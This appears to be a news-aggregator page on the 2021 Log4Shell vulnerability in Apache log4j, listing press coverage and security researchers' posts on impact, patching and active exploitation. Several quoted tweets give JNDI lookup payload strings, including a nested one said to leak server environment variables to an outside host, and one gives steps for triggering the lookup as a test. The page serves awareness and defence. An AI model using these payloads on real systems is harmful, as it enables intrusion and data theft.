A vulnerability in the Apache log4j Java logging library allows for remote code execution, impacting Steam, iCloud, Minecraft, and other services
A few hours ago, a -day exploit in the popular Java logging library, log4j, was tweeted along with a POC posted on GitHub that results …
LunaSec Blog
Related Coverage
- ‘The Internet Is on Fire’ — A vulnerability in the Log4j logging framework has security teams scrambling to put in a fix. Wired · Lily Hay Newman
- Recently uncovered software flaw ‘most critical vulnerability of the last decade’ Associated Press
- CVE-2021-44228 Detail — AWAITING ANALYSIS — This vulnerability is currently awaiting analysis. nvd.nist.gov
- Apache Releases Log4j Version 2.15.0 to Address Critical RCE Vulnerability Under Exploitation CISA
- Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet Ars Technica · Dan Goodin
- View article Engadget
- What's the Deal with the Log4Shell Security Nightmare? Lawfare · Nicholas Weaver
- Log4j RCE 0-day actively exploited CERT NZ
- to secure the supply chain, you must properly fund it Ariadne's Space · Ariadne Conill
- ‘Extremely bad’ vulnerability found in widely used logging system The Verge · Corin Faife
- How Cloudflare security responded to log4j2 vulnerability The Cloudflare Blog · Rushil Shah
- A Simple Exploit is Exposing the Biggest Apps on the Internet VICE · Lorenzo Franceschi-Bicchierai
- View article HackRead
- Global race to patch critical computer bug Tech Xplore · Frank Bajak
- New Zero-Day In the Log4j Java Library Is Already Being Exploited Slashdot · BeauHD
- Finding applications that use Log4J Rumble Network Discovery · Pearce Barry
- Vulnerability Affecting Multiple Log4j Versions Permits RCE Exploit InfoQ · Olimpiu Pop
- View article Check Point Software
- Extremely Critical Log4J Vulnerability Leaves Much of the Internet at Risk The Hacker News · Ravie Lakshmanan
- Inside the log4j2 vulnerability (CVE-2021-44228) The Cloudflare Blog · John Graham-Cumming
- CVE-2021-44228 Apache Log4j RCE Attempts Dec 10th 3:40PM ET Gist · Gnremy
- View article reddit
- New zero-day exploit for Log4j Java library is an enterprise nightmare BleepingComputer · Sergiu Gatlan
- Cybereason released Logout4Shell, a vaccine for Log4Shell Apache Log4j RCE Security Affairs · Pierluigi Paganini
- Critical New 0-day Vulnerability in Popular Log4j Library Discovered with Evidence of Mass Scanning for Affected Applications Sonatype Blog · Ilkka Turunen
- CVE-2021-44228 - Log4j 2 Vulnerability Analysis Randori
- Cybereason Releases Vaccine to Prevent Exploitation of Apache Log4Shell Vulnerability (CVE-2021-44228) Cybereason I Cybersecurity … · Yonatan Striem-Amit
- Security warning: New zero-day in the Log4j Java library is already being exploited ZDNet · Danny Palmer
- Critical ‘Log4Shell’ RCE zero-day exploited in large numbers iTnews · Juha Saarinen
- The Log4j vulnerability is bad. Here's the good news VentureBeat · Kyle Alspach
- Security Experts Sound Alarm on Zero-Day in Widely Used Log4j Tool Dark Reading · Jai Vijayan
- Dangerous “Log4j” security vulnerability affects everything from Apple to Minecraft XDA Developers · Adam Conway
- Serious security vulnerability affects Minecraft, iCloud, Steam and pretty much the whole of the internet TechRadar · Anthony Spadafora
- Officials, experts sound the alarm about critical cyber vulnerability The Hill · Maggie Miller
- Minecraft Players Need to Update Immediately as Nasty Zero-Day Threatens Apps Across the Web Gizmodo · Lucas Ropek
- Critical RCE Vulnerability: log4j - CVE-2021-44228 Huntress Blog · John Hammond
- iCloud and other services vulnerable to new ‘Log4Shell’ exploit impacting logging systems 9to5Mac · Filipe Espósito
- Catastrophic Log4j Security Fail Threatens Enterprise Systems & Web Apps Worldwide Search Engine Journal · Miranda Miller
- Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild Cisco Talos Intelligence Group · Edmund Brumaghin
- A global race is on to patch a critical computer bug Associated Press
- Critical vulnerability found in open-source tool used by Apple, Microsoft and others SiliconANGLE · Maria Deutscher
- Log4j zero-day “Log4Shell” arrives just in time to ruin your weekend Malwarebytes Labs · Pieter Arntz
- Serious security flaw threatens Minecraft and possibly the entire internet — what to do Tom's Guide · Paul Wagenseil
- Researchers warn of a ‘very, very scary’ bug affecting major apps Protocol · Issie Lapowsky
- Severe flaw in Java library impacts iCloud, Amazon, Steam, and more AppleInsider · Mike Peterson
- Minecraft rushes out patch for critical Log4j vulnerability BleepingComputer · Sergiu Gatlan
- Log4j RCE: Emergency patch issued to plug critical auth-free code execution hole in widely-used logging utility The Register · Gareth Corfield
- Critical RCE 0day in Apache Log4j library exploited in the wild (CVE-2021-44228) Help Net Security · Zeljka Zorz
- Log4j vulnerability, a bombshell zero-day exploit with global impact cybernews.com · Vilius Petkauskas
- Apple iCloud, Twitter and Minecraft vulnerable to ‘ubiquitous’ zero-day exploit TechCrunch · Carly Page
- Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack Threatpost · Lisa Vaas
- Countless Serves Are Vulnerable to Apache Log4j Zero-Day Exploit PCMag · Nathaniel Mott
- Log4Shell: Log4j Remote Code Execution Michael Tsai
- 默认情况 下.止 Minecraft 日志记录 中使. Message Pattern Lookup huanghongxun/HMCL#1209 GitHub · Apache
- log4j exploit — Thought I'd bring this up here since it seems like there isn't a thread … Wynncraft Forums
- Protecting against CVE-2021-44228 (Apache Log4j2 versions 2.14.1) Check Point Software · Jacinta Paul
- Researchers release ‘vaccine’ for critical Log4Shell vulnerability BleepingComputer · Lawrence Abrams
- “Log4Shell” Java vulnerability - how to safeguard your servers Naked Security · Paul Ducklin
- URGENT: Analysis and Remediation Guidance to the Log4j Zero-Day RCE (CVE-2021-44228) Vulnerability Application Security Research, News …
- Logout4Shell — A vulnerability impacting Apache Log4j versions 2. through 2.14.1 was disclosed … GitHub · Cybereason
- Apache Log4j unauthenticated remote code execution Security Boulevard
Discussion
-
reddit
reddit
on reddit
RCE 0-day exploit found in log4j, a popular Java logging package
-
@_staticflow_
Tanner Barnes
on x
In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like ${jndi:ldap://${env:user}.xyz.collab.co m/ a} Will leak server side env vars!
-
@yazicivo
@yazicivo
on x
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. htt…
-
@malwaretechblog
Marcus Hutchins
on x
This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable.
-
@nsa_csdirector
Rob Joyce
on x
The log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA's GHIDRA. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure. https://arstechnica.com/.…
-
@secbro1
SecBro
on x
https://twitter.com/...
-
@kikta
@kikta
on x
Gonna be one of those weekends https://twitter.com/...
-
@cyb3rops
@cyb3rops
on x
How to test your apps for #log4shell vulnerability 1. Generate a DNS token https://canarytokens.org/... 2. Wrap that token in Prefix: ${jndi:ldap:// Suffix: /a} 3. Use that value in search forms, profile data, settings etc. of your apps 4. Get notified when you triggered a reacti…
-
@tarah
Tarah M. Wheeler
on x
Months from now, I don't want to hear that a major consumer financial institution failed to patch this five alarm CVE Apache vulnerability. I'm tired of opening emails that start with “we take your privacy and security very seriously.” https://twitter.com/...
-
@certnz
Cert Nz
on x
CERT NZ has released an advisory on a Java vulnerability. Reports from online users show that this is being actively exploited and that proof-of-concept code has been published. https://www.cert.govt.nz/...
-
@weldpond
Chris Wysopal
on x
The patched version of log4j 2.15.0 requires a minimum of Java 8. If you are on Java 7 you will need to upgrade to Java8 When there is active exploitation and you need to patch fast it is beneficial if you have been updating your other dependencies over time.
-
@campuscodi
Catalin Cimpanu
on x
I have a feeling I'll be doing follow-up breach stories related to that log4j bug 'til Easter
-
@eastdakota
@eastdakota
on x
Patch your systems. #Log4J is being actively exploited. https://twitter.com/...
-
@erratarob
@erratarob
on x
🚨🚨🚨🚨 🚨🚨🚨🚨 🚨🚨🚨🚨 If there were an Internet threat level where your organization needs to panic, this is it. Your org needs to deal with the log4j problem. 🚨🚨🚨🚨 🚨🚨🚨🚨 🚨🚨🚨🚨
-
@briannawu
Brianna Wu
on x
Not sure why a logging app needs code execution. In either case, this is extremely serious. Thinking of all my infosec friends who will be working all weekend. https://twitter.com/...
-
@uscert_gov
Us-Cert
on x
Upgrade ASAP to protect yourself from the #RCE vulnerability, CVE-2021-44228, affecting Apache Log4j. Read more at https://www.cisa.gov/... #ZeroDay #Cybersecurity #InfoSec
-
@erratarob
@erratarob
on x
Step #1: get a list of all your products exposed to the Internet that use Java. Step #2: call support for each and every one and ask the vendor. Vendors who don't have a canned answer are bad vendors who should not be trusted in the future. https://twitter.com/...
-
@eastdakota
@eastdakota
on x
The #Log4J vulnerability is the worst Internet-wide vulnerability since #Shellshock. @Cloudflare has updated our WAF and Zero Trust solutions to protect our customers. https://blog.cloudflare.com/ ...
-
@tgockel
Travis Gockel
on x
Today's log4j vulnerability's root cause was described by @pwntester in 2016. https://www.blackhat.com/...
-
@eastdakota
@eastdakota
on x
We often talk about computer viruses. One interesting thing about #Log4J is that exploits may act more like a spore. So many different systems pass logs between them. The exploit string may act like a spore, laying dormant until it encounters a vulnerable log system.
-
@gossithedog
Kevin Beaumont
on x
Targeting for Log4Shell so far seen in wild - password reset/forgot password forms, and search forms. I'm guessing orgs log and process searches and usernames in forgot password flows.
-
@_noid_
@_noid_
on x
@kikta The amount of people saying “We use it, but those systems aren't directly accessible from the Internet” is just killing me.
-
@gossithedog
Kevin Beaumont
on x
My number one take away for defenders right now is: keep calm. It's an evolving situation. No easy fix. Defence in depth is best defence: eg if you don't allow unrestricted outbound internet from webapps, you're in a good place as you need outbound traffic to exploit.
-
@swiftonsecurity
@swiftonsecurity
on x
Putin thinking about all the US agencies he's gonna hack with Log4j https://twitter.com/...
-
@malwarejake
Jake Williams
on x
Nothing says “brace for impact” on a vulnerability like coin miners being deployed. This is bottom feeder activity, consider it like a low water mark. https://twitter.com/...
-
@jacobian
@jacobian
on x
📢 Folks, an extraordinarily bad RCE in log4j dropped today. If you use a JVM, your code or a dep probably uses log4j; you're vulnerable if you log user-supplied data. I know it's late but this one's bad enough it's worth starting your IR process now, or first thing tmrw. [1/2]
-
@hackinglz
Justin
on x
@kikta This will take us well into January “hey do you have a software/server inventory??...sure!” “including all the dependencies??” ☠️
-
@randoriattack
@randoriattack
on x
The Randori Attack Team can confirm exploitability of VMWare products in live environments (VMSA-2021-0028) via Log4j (CVE-2021-44228) aka “Log4Shell”. This is a critical vulnerability. Follow @RandoriAttack for updates: https://www.randori.com/... 1/3
-
@sans_isc
Sans Isc
on x
Apache #log4j2 exploitation in full swing. PATCH NOW!! CVE-2021-44228 . 200+ exploit attempts against our honeypot so far from approx 100 sources. “bingsearchlib[.]com:39356” is particularly popular #log4j #cve202144228 #rce #0day #PATCHNOW https://twitter.com/...
-
@invalidname
Chris Adamson
on x
BTW, peeps on Apple platforms, the Log4j security hole should be your reminder that if you conform to NSCoding, you really should also conform to NSSecureCoding. • https://developer.apple.com/ ... • https://nshipster.com/... https://twitter.com/...
-
@c_c_krebs
Chris Krebs
on x
This one is pretty brutal based on the much smarter people I'm hearing from. Log4j is everywhere, it's trivial to exploit, & can be daisy chained thru services. The good news is Apache got a fix out fast and IT/IR teams are more & more primed for these events. The race is on... h…
-
@cybernigma
@cybernigma
on x
It looks like facebook messenger (web) is vulnerable. I also got a hit through google's messages for web (SMS pairing). #log4j
-
@lunasecio
LunaSec
on x
We added information about how you can test if you're vulnerable to our blog post on #Log4Shell. If you have found a better way, please let us know! https://www.lunasec.io/...
-
@gossithedog
Kevin Beaumont
on x
If you already upgraded code to use just released log4j-2.15.0-rc1, it's still vulnerable - you now need to apply log4j-2.15.0-rc2 as there was a bypass. They is no stable release which fixes yet.
-
@gossithedog
Kevin Beaumont
on x
There's some other pivots on this - even if you only do a DNS lookup, you can lookup, er, stuff. https://twitter.com/...
-
@getajobmike
Mike Perham
on x
This log4j RCE is a great example of how software complexity can cause very bad unintended consequences. Literally every Java project in the world uses log4j. https://www.lunasec.io/...
-
@gossithedog
Kevin Beaumont
on x
Starting a new thread for log4j security vulnerability and fallout. Spoiler: although this emerged as a Minecraft issue (lol) there is going to be impacts across a wide range of enterprise software for some time. https://twitter.com/...
-
@malwarebytes
@malwarebytes
on x
A few hours ago, a 0-day RCE exploit was discovered in the logging library log4j. You may not have heard of it, but it's everywhere. Per @LunaSecIO: “Many, many services are vulnerable”. They include Steam, Apple iCloud, Minecraft, and others. https://www.lunasec.io/...
-
@badlionclient
Badlion Client
on x
We have released a special patch today on Badlion Client across all Minecraft versions to fix an exploit recently discovered due to a 3rd party library. We will always make sure our users are safe! 🦁 For more details about this exploit see here: https://www.lunasec.io/...
-
@gossithedog
Kevin Beaumont
on x
In English explainer about why Log4Shell is a big vulnerability: It's like if you locked the doors to your car, but then allowed anybody to shout commands at Siri from outside the car to remotely drive it. Log4j is buried deep inside products and orgs, gonna be painful to fix.
-
@gossithedog
Kevin Beaumont
on x
Me in 2049, talking to the 18 year old entering cyber: ‘back in my day, somebody made a Minecraft video game command you type in chat, which ended up screwed up all the security controls that existed. Yes, we sucked’.
-
@reybango
Rey Bango
on x
URGENT: if you're using log4j in your applications for logging, you need to update it. There's a remote code execution bug in it. GitHub labeled the vulnerability as “critical severity” https://www.vice.com/... via @vice
-
@campuscodi
Catalin Cimpanu
on x
The Log4j zero-day (tracked as CVE-2021-44228, or #Log4Shell) has received an official security fix just as scans for vulnerable systems are ramping up https://therecord.media/... https://twitter.com/...
-
@campuscodi
Catalin Cimpanu
on x
Let me save you a bunch of clicks: PoC: https://github.com/... Patch: https://logging.apache.org/... Technical breakdown: https://www.lunasec.io/... Systems confirmed vulnerable: https://github.com/... https://twitter.com/...
-
@jasonbcox0
Jason Cox
on x
0-day RCE vulnerability in log4j is getting exploited all over the place today. Fortunately a small config change can protect you. If you have a Java stack, stop what you're doing and read this ASAP! https://twitter.com/...
-
@uuallan
@uuallan
on x
Happy Patch Friday. This is remotely executable and is being scanned for/presumably exploited in wild. You know the drill... https://twitter.com/...